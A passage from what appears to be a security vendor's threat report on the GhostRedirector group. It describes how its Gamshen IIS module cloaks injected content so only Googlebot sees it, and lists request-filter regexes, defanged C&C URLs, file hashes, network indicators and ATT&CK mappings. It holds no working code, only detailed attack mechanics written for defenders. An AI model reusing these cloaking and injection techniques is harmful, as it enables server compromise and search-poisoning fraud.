height=\"\"\/><figcaption><em>Figure 5. Executing commands on a testing server<\/em><\/figcaption><\/figure>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 6. Adding a user through the malware on a testing server\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-6-adding-a-user-through-the-malware-on-a-testing-server.png\" alt=\"Figure 6 - Adding a user through the malware on a testing server\" width=\"\" height=\"\"\/><figcaption><em>Figure 6. Adding a user through the malware on a testing server<\/em><\/figcaption><\/figure>\n<h3>Gamshen, malicious IIS module<\/h3>\n<p>Developed as a C\/C++ DLL, Gamshen is a malicious native IIS module. The main functionality of this malware is to intercept requests made to the compromised server from the Googlebot search engine crawler and only in that case modify the legitimate response of the server. The response is modified based on data requested dynamically from Gamshen\u2019s C&amp;C server. By doing this, GhostRedirector attempts to manipulate the Google search ranking of a specific, third-party website, by using manipulative, shady SEO techniques such as creating artificial backlinks from the legitimate, compromised website to the target website. We previously documented a case of an IIS trojan using similar tactics: see IISerpent: Malware-driven SEO fraud as a service.<\/p>\n<p>It&#8217;s important to mention that a regular user who visits the affected website wouldn\u2019t see any changes and would not be affected by the malicious behavior because Gamshen doesn\u2019t trigger any of its malicious activity on requests from regular visitors.<\/p>\n<p>Figure 7 shows how a malicious module participating in the IIS SEO fraud scheme modifies the legitimate response of a compromised server when a request is made from the Google Crawler, aka Googlebot.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 7. Overview of an SEO fraud scheme\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-7-overview-of-an-seo-fraud-scheme.png\" alt=\"Figure 7 - Overview of an SEO fraud scheme\" width=\"\" height=\"\"\/><figcaption><em>Figure 7. Overview of an SEO fraud scheme<\/em><\/figcaption><\/figure>\n<p>In order to do this, the attackers have implemented their own malicious code for the following IIS event handlers:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnBeginRequest<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnPreExecuteRequestHandler<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnPostExecuteRequestHandler<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">OnSendResponse<\/span><\/li>\n<\/ul>\n<p>When the compromised server receives an HTTP request, the request goes through the IIS request processing pipeline, which triggers these handlers in various steps of the process \u2013 notably, the <span style=\"font-family: courier new, courier, monospace;\">OnSendResponse<\/span> handler is triggered just before the HTTP response is sent out by the compromised server. Since Gamshen is installed as an IIS module, it automatically intercepts each incoming HTTP request at these steps, and performs three actions.<\/p>\n<p>First, it performs a series of validations to filter only HTTP requests of interest:<\/p>\n<ul>\n<li>The request must originate from a Google crawler: either the <span style=\"font-family: courier new, courier, monospace;\">User-Agent<\/span> header contains the string <span style=\"font-family: courier new, courier, monospace;\">Googlebot<\/span>, or the <span style=\"font-family: courier new, courier, monospace;\">Referer<\/span> contains the string <span style=\"font-family: courier new, courier, monospace;\">google.com<\/span>.<\/li>\n<li>The HTTP method must not be <span style=\"font-family: courier new, courier, monospace;\">POST<\/span>.<\/li>\n<li>The requested resource is not an image, stylesheet, or similar static resource, i.e., it doesn\u2019t have any of the following extensions: <span style=\"font-family: courier new, courier, monospace;\">.jpg<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.resx<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.png<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.jpeg<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.bmp<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.gif<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.ico<\/span>, <span style=\"font-family: courier new, courier, monospace;\">.css<\/span>, or <span style=\"font-family: courier new, courier, monospace;\">.js<\/span>. This is likely to avoid breaking UI functionality.<\/li>\n<li>The URL must contain the string <span style=\"font-family: courier new, courier, monospace;\">android_<\/span> or match any of the following regular expressions:\n<p style=\"margin-top: 1em;\"><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)_([0-9_]{6,20})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)_([a-zA-Z0-9_]{6,8})\\\\\/([a-zA-Z0-9_]{6,20})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\\/([0-9_]{6,20})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?(android|plays|articles|details|iosapp|topnews|joga)\\\\\/([a-zA-Z]{8,10})(\/|\\\\.\\\\w+)?<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-zA-Z0-9]{6,8})\\\\\/([a-zA-Z0-9]{6,8})(\/|\\\\.phtml|\\\\.xhtml|\\\\.phtm|\\\\.shtml)<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-zA-Z0-9_]{14})(\/|\\\\.html|\\\\.htm)<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-zA-Z0-9]{6})\\\\\/([a-zA-Z0-9]{8})(\/|\\\\.html|\\\\.htm)<\/span><\/p>\n<p><span style=\"color: #00a0a0; font-size: 1.25em; vertical-align: middle;\">\u25cb<\/span> <span style=\"font-family: courier new, courier, monospace;\">[\/]?([a-z0-9]{6})\\\\.xhtml<\/span><\/p>\n<\/li>\n<\/ul>\n<p>Second, Gamshen modifies the response intended for the search engine crawler with data obtained from its own C&amp;C server, <span style=\"font-family: courier new, courier, monospace;\">brproxy.868id[.]com<\/span>. We have observed three URLs being used for this purpose:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/brproxy.868id[.]com\/index_base64.php?<original_url\/><\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/brproxy.868id[.]com\/tz_base64.php?<original_url\/><\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">https:\/\/brproxy.868id[.]com\/url\/index_base64.php<\/span><\/li>\n<\/ul>\n<p>In all cases, the following hardcoded <span style=\"font-family: courier new, courier, monospace;\">User-Agent<\/span> string is used: <span style=\"font-family: courier new, courier, monospace;\">Mozilla\/5.0 (compatible; Googlebot\/2.1; +http:\/\/www.google.com\/bot.html<\/span>). A base64-encoded response is expected, which is then decoded and injected into the HTTP response intended for the search engine crawler.<\/p>\n<p>Finally, at the last step of the request processing pipeline, just before the HTTP response is sent out \u2013 the <span style=\"font-family: courier new, courier, monospace;\">OnSendResponse<\/span> event handler verifies the response for these crawler requests. If the response has the <span style=\"font-family: courier new, courier, monospace;\">404<\/span> HTTP status code \u2013 i.e., Gamshen had not been able to obtain the malicious data from its C&amp;C server, then it instead performs a redirect to a different C&amp;C server: <span style=\"font-family: courier new, courier, monospace;\">http:\/\/gobr.868id[.]com\/tz.php<\/span>.<\/p>\n<p>We weren\u2019t able to obtain a response from <span style=\"font-family: courier new, courier, monospace;\">brproxy.868id[.]com<\/span> or <span style=\"font-family: courier new, courier, monospace;\">gobr.868id[.]com<\/span>, but believe the data supports <a href=\"https:\/\/blog.hubspot.com\/marketing\/black-hat-seo\">shady SEO techniques<\/a> \u2013 such as keyword stuffing, inserting malicious backlinks \u2013 or, in case of the redirection, making the search engine associate the compromised website with the target, third-party website, thus poisoning the search index.<\/p>\n<p>We were, however, able to pivot on those domains on VirusTotal and find related images \u2013 in this case, images advertising a gambling application for Portuguese speaking users. We believe this website is the beneficiary of the SEO fraud scheme, facilitated by this malicious IIS module \u2013 Gamshen probably attempts to compromise as many websites as possible and misuse their reputation to drive traffic to this third-party website.<\/p>\n<p>Figure 8 and Figure 9 show two images potentially used by GhostRedirector in its SEO fraud scheme.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 8. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Benefits and privileges for VIP members)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-8-a-gambling-website-likely-benefiting-from-the-seo-fraud-scheme.png\" alt=\"Figure 8 - A gambling website likely benefiting from the SEO fraud scheme\" width=\"\" height=\"\"\/><figcaption><em>Figure 8. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Benefits and privileges for VIP members)<\/em><\/figcaption><\/figure>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 9. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Large deposits and withdrawals without worries)\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/09-25\/gr\/figure-9-a-gambling-website-likely-benefiting-from-the-seo-fraud-scheme.png\" alt=\"Figure 9 - A gambling website likely benefiting from the SEO fraud scheme\" width=\"\" height=\"\"\/><figcaption><em>Figure 9. A gambling website likely benefiting from the SEO fraud scheme (machine translation: Large deposits and withdrawals without worries)<\/em><\/figcaption><\/figure>\n<h2>Conclusion<\/h2>\n<p>In this blogpost, we have presented a previously unknown, China-aligned threat actor, GhostRedirector, and its toolkit for compromising and abusing Windows servers. In addition to enabling remote command execution on the compromised servers, GhostRedirector also deploys a malicious IIS module, Gamshen, designed to manipulate Google search results through shady SEO tactics. Gamshen abuses the credibility of the websites hosted on the compromised server to promote a third-party, gambling website \u2013 potentially a paying client participating in an SEO fraud as-a-service scheme.<\/p>\n<p>GhostRedirector also demonstrates persistence and operational resilience by deploying multiple remote access tools on the compromised server, on top of creating rogue user accounts, all to maintain long-term access to the compromised infrastructure.<\/p>\n<blockquote>\n<p><em>Mitigation recommendations can be found in our comprehensive <a href=\"https:\/\/i.blackhat.com\/USA21\/Wednesday-Handouts\/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf\" target=\"_blank\" rel=\"noopener\">white paper<\/a>. For any inquiries, or to make sample submissions related to the subject, contact us at threatintel@eset.com.<\/em><\/p>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>A comprehensive list of indicators of compromise (IoCs) and samples can be found in <a href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/GhostRedirector\" target=\"_blank\" rel=\"noopener\">our GitHub repository<\/a>.<\/p>\n<h3>Files<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"132\"><strong>Filename<\/strong><\/td>\n<td width=\"151\"><strong>Detection<\/strong><\/td>\n<td width=\"180\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">EE22BA5453ED577F8664<wbr\/>CA390EB311D067E47786<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">SitePut.exe<\/span><\/td>\n<td width=\"151\">MSIL\/Agent.FEZ<\/td>\n<td width=\"180\">Zunput, information collector and webshell installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">677B3F9D780BE184528D<wbr\/>E5967936693584D9769A<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">EfsNetAutoUser.exe<\/span><\/td>\n<td width=\"151\">MSIL\/HackTool.Agent<wbr\/>.QJ<\/td>\n<td width=\"180\">A custom tool using the EfsPotato exploit to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5D4D7C96A9E302053BDF<wbr\/>AF2449F9A2AB3C806E63<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">NetAutoUser.exe<\/span><\/td>\n<td width=\"151\">MSIL\/AddUser.S<\/td>\n<td width=\"180\">A custom tool using the BadPotato exploit to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">28140A5A29EBA098BC62<wbr\/>15DDAC8E56EACBB29B69<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">miniscreen.dll<\/span><\/td>\n<td width=\"151\">Win64\/Agent.ELA<\/td>\n<td width=\"180\">Rungan, a passive C++ backdoor.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">371818BDC20669DF3CA4<wbr\/>4BE758200872D583A3B8<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">auto.exe<\/span><\/td>\n<td width=\"151\">Generik.KJWBIPC<\/td>\n<td width=\"180\">A tool to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">9DD282184DDFA796204C<wbr\/>1D90A46CAA117F46C8E1<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">auto_sign.exe<\/span><\/td>\n<td width=\"151\">MSIL\/Agent.XQL<\/td>\n<td width=\"180\">A tool to create a new user or deploy webshells on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">87F354EAA1A6ED5AE51C<wbr\/>4B1A1A801B6CF818DAFC<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">EfsNetAutoUser.exe<\/span><\/td>\n<td width=\"151\">MSIL\/HackTool.Agent<wbr\/>.QJ<\/td>\n<td width=\"180\">A custom tool using the EfsPotato exploit to create a new user on the compromised server.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5A01981D3F31AF47614E<wbr\/>51E6C216BED70D921D60<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">DotNet4.5.exe<\/span><\/td>\n<td width=\"151\">MSIL\/AddUser.S<\/td>\n<td width=\"180\">Custom tool using BadPotato exploit to elevate privileges of an existing user.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">6EBD7498FC3B744CED37<wbr\/>1C379BA537077DD97036<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">NetAUtoUser_sign<wbr\/>.exe<\/span><\/td>\n<td width=\"151\">MSIL\/AddUser.S<\/td>\n<td width=\"180\">Custom tool using BadPotato exploit to elevated privileges of an existing user.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">0EE926E29874324E52DE<wbr\/>816B74B12069529BB556<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">link.exe<\/span><\/td>\n<td width=\"151\">Win64\/RemoteAdmin.<wbr\/>GotoHTTP. <wbr\/>A potentially<wbr\/> unsafe application<\/td>\n<td width=\"180\">GoToHTTP tool.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">373BD3CED51E19E88876<wbr\/>B80225ECA65A5C01413F<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">PHP\/Webshell.NWE<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5CFFC4B3B96256A45FB4<wbr\/>5056AE0A9DC76329C25A<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.MP<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">B017CEE02D74C92B2C65<wbr\/>517101DC72AFA7D18F16<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">PHP\/Webshell.OHB<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A8EE056799BFEB709C08<wbr\/>D0E41D9511CED5B1F19D<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UV<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">C4681F768622BD613CBF<wbr\/>46B218CDA06F87559825<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.KU<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">E69E4E5822A81F68107B<wbr\/>933B7653C487D055C51B<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UZ<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A3A55E4C1373E8287E4E<wbr\/>4D5D3350AC665E1411A7<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UY<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">E6E4634CE5AFDA0688E7<wbr\/>3A2C21A2ECDABD5E155D<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UY<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">5DFC2D0858DD7E811CD1<wbr\/>9938B8C28468BE494CB6<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">ASP\/Webshell.UX<\/td>\n<td width=\"180\">Webshell.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">08AB5CC8618FA593D2DF<wbr\/>91900067DB464DC72B3E<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ManagedEngine32<wbr\/>_v2.dll<\/span><\/td>\n<td width=\"151\">Win32\/BadIIS.AG<\/td>\n<td width=\"180\">Gamshen, a malicious IIS module.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">871A4DF66A8BAC3E640B<wbr\/>2D1C0AFC075BB3761954<\/span><\/td>\n<td width=\"132\"><span style=\"font-family: courier new, courier, monospace;\">ManagedEngine64<wbr\/>_v2.dll<\/span><\/td>\n<td width=\"151\">Win64\/BadIIS.CY<\/td>\n<td width=\"180\">Gamshen, a malicious IIS module.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">049C343A9DAAF3A93756<wbr\/>562ED73375082192F5A8<\/span><\/td>\n<td width=\"132\">N\/A<\/td>\n<td width=\"151\">MSIL\/Agent.FFZ<\/td>\n<td width=\"180\">Comdai, a malicious multipurpose DLL used to create a malicious user.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Network<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"151\"><strong>IP<\/strong><\/td>\n<td width=\"142\"><strong>Domain<\/strong><\/td>\n<td width=\"113\"><strong>Hosting provider<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"151\"><strong>Details<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">xzs.868id[.]com<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2024\u201112\u201103<\/td>\n<td width=\"151\">GhostRedirector staging server, hosted on Cloudflare.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">104.233.192[.]1<\/span><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">xz.868id[.]com<\/span><\/td>\n<td width=\"113\">PEG TECH INC<\/td>\n<td width=\"85\">2024\u201112\u201103<\/td>\n<td width=\"151\">GhostRedirector staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">104.233.210[.]229<\/span><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">q.822th[.]com<\/span><br \/><span style=\"font-family: courier new, courier, monospace;\">www.881vn[.]com<\/span><\/td>\n<td width=\"113\">PEG TECH INC<\/td>\n<td width=\"85\">2023\u201110\u201106<\/td>\n<td width=\"151\">GhostRedirector staging server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">gobr.868id[.]com<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2024\u201108\u201125<\/td>\n<td width=\"151\">Gamshen C&amp;C server, hosted on Cloudflare.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\">N\/A<\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">brproxy.868id[.]com<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2024\u201108\u201125<\/td>\n<td width=\"151\">Gamshen C&amp;C server, hosted on Cloudflare.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">43.228.126[.]4<\/span><\/td>\n<td width=\"142\"><span style=\"font-family: courier new, courier, monospace;\">www.cs01[.]shop<\/span><\/td>\n<td width=\"113\">XIMBO Internet Limited<\/td>\n<td width=\"85\">2024\u201104\u201101<\/td>\n<td width=\"151\">Comdai C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"151\"><span style=\"font-family: courier new, courier, monospace;\">103.251.112[.]11<\/span><\/td>\n<td width=\"142\">N\/A<\/td>\n<td width=\"113\">IRT\u2011HK\u2011ANS<\/td>\n<td width=\"85\">N\/A<\/td>\n<td width=\"151\">GhostRedirector staging server.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK techniques<\/h2>\n<p>This table was built using <a href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">version 17<\/a> of the MITRE ATT&amp;CK framework.<\/p>\n<table style=\"height: 1370px;\" border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr style=\"height: 18px;\">\n<td style=\"height: 18px;\" width=\"113\"><strong>Tactic<\/strong><\/td>\n<td style=\"height: 18px;\" width=\"113\"><strong>ID<\/strong><\/td>\n<td style=\"height: 18px;\" width=\"151\"><strong>Name<\/strong><\/td>\n<td style=\"height: 18px;\" width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr style=\"height: 72px;\">\n<td style=\"height: 396px;\" rowspan=\"8\" width=\"113\"><strong>Resource Development<\/strong><\/td>\n<td style=\"height: 72px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1588\/002\" target=\"_blank\" rel=\"noopener\">T1588.002<\/a><\/td>\n<td style=\"height: 72px;\" width=\"151\">Obtain Capabilities: Tool<\/td>\n<td style=\"height: 72px;\" width=\"265\">GhostRedirector uses <a href=\"https:\/\/www.eziriz.com\/dotnet_reactor.htm\" target=\"_blank\" rel=\"noopener\">.NET Reactor<\/a> to obfuscate its tools, and used EfsPotato and BadPotato to develop custom privilege escalation tools.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1587\/001\" target=\"_blank\" rel=\"noopener\">T1587.001<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Develop Capabilities: Malware<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector develops its own malware<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/006\" target=\"_blank\" rel=\"noopener\">T1608.006<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Stage Capabilities: SEO Poisoning<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses SEO poisoning to manipulate search results and drive traffic to a third-party website.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/001\" target=\"_blank\" rel=\"noopener\">T1583.001<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Acquire Infrastructure: Domains<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses malicious domains for hosting payloads and for its C&amp;C servers.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/004\" target=\"_blank\" rel=\"noopener\">T1583.004<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Acquire Infrastructure: Server<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector leverages Cloudflare on its infrastructure.<\/td>\n<\/tr>\n<tr style=\"height: 36px;\">\n<td style=\"height: 36px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/001\" target=\"_blank\" rel=\"noopener\">T1608.001<\/a><\/td>\n<td style=\"height: 36px;\" width=\"151\">Stage Capabilities: Upload Malware<\/td>\n<td style=\"height: 36px;\" width=\"265\">GhostRedirector has staged Rungan and Gamshen on attacker-controlled servers.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/002\" target=\"_blank\" rel=\"noopener\">T1608.002<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Stage Capabilities: Upload Tool<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector has staged various malicious and legitimate tools on attacker-controlled servers.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1588\/003\" target=\"_blank\" rel=\"noopener\">T1588.003<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Obtain Capabilities: Code Signing Certificates<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector obtained a certificate for signing its tools, like those for privilege escalation.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><strong>Initial Access<\/strong><\/td>\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1190\" target=\"_blank\" rel=\"noopener\">T1190<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Exploit Public-Facing Application<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector exploits an unknown SQL injection vulnerability on the victim\u2019s server.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 234px;\" rowspan=\"4\" width=\"113\"><strong>Execution<\/strong><\/td>\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1106\" target=\"_blank\" rel=\"noopener\">T1106<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Native API<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector may use APIs such as <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/win32\/api\/http\/nf-http-httpinitialize\" target=\"_blank\" rel=\"noopener\">HttpInitialize<\/a> and <a href=\"https:\/\/learn.microsoft.com\/en-us\/windows\/desktop\/api\/Http\/nf-http-httpaddurl\" target=\"_blank\" rel=\"noopener\">HttpAddUrl<\/a> for registering a URL.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/001\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a><\/td>\n<td style=\"height: 54px;\" width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td style=\"height: 54px;\" width=\"265\">GhostRedirector uses PowerShell interpreter to download malware.<\/td>\n<\/tr>\n<tr style=\"height: 72px;\">\n<td style=\"height: 72px;\" width=\"113\"><a href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/003\" target=\"_blank\" rel=\"noopener\">T1059.003<\/a><\/td>\n<td style=\"height: 72px;\" width=\"151\">Command and Scripting Interpreter: Windows Command Shell<\/td>\n<td style=\"height: 72px;\" width=\"265\">GhostRedirector can execute <span style=\"font-family: courier new, courier, monospace;\">cmd.exe<\/span> commands to download malware.<\/td>\n<\/tr>\n<tr style=\"height: 54px;\">\n<td style=\"height: 54px;\" width=\"113\"><a 